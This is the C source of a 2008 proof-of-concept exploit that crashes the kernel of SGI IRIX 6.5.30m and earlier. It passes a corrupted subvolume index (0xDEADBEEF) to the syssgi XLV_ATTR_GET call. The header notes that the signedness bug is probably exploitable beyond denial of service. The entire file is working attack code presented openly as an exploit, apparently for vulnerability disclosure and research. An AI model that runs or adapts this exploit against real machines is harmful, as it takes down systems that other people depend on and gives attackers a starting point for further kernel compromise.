/* irix-xlvattrget-dos.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * SGI IRIX <= 6.5.30m local kernel DoS POC
 * by mu-b - Thu 05 Jun 2008
 *
 * - Tested on: SGI IRIX 6.5.30m (MIPS)
 *
 * signedness for the win!@$! this is likely not just a DoS,
 * but I won't bother playing..
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <sys/syssgi.h>

#define XLV_ATTR_STATS  13

typedef struct xlv_attr_cursor {
  int generation;
  /* The following provides context information */
  int vol;                    /* volume table index */
  int subvol;                 /* minor device number */
  int plex;                   /* which plex in subvolume */
  int ve;                     /* which volume element in plex */
} xlv_attr_cursor_t;

int
main (int argc, char **argv)
{
  xlv_attr_cursor_t tcursor;
  char buf[1024];             /* xlv_attr_req_t */
  int r;

  printf ("SGI IRIX <= 6.5.30m local kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  r = syssgi (SGI_XLV_ATTR_CURSOR, &tcursor);
  if (r < 0)
    {
      fprintf (stderr, "%s: syssgi [SGI_XLV_ATTR_CURSOR] failed\n",
               argv[0]);
      exit (EXIT_FAILURE);
    }

  printf ("* cursor.gen: %d\n", tcursor.generation);

  tcursor.subvol = 0xDEADBEEF;
  *(int *) &buf[0] = XLV_ATTR_STATS;

  printf ("* hitting\n");
  r = syssgi (SGI_XLV_ATTR_GET, &tcursor, buf);
  if (r < 0)
    {
      fprintf (stderr, "%s: syssgi [SGI_XLV_ATTR_GET] failed\n",
               argv[0]);
      exit (EXIT_FAILURE);
    }

  return (EXIT_SUCCESS);
}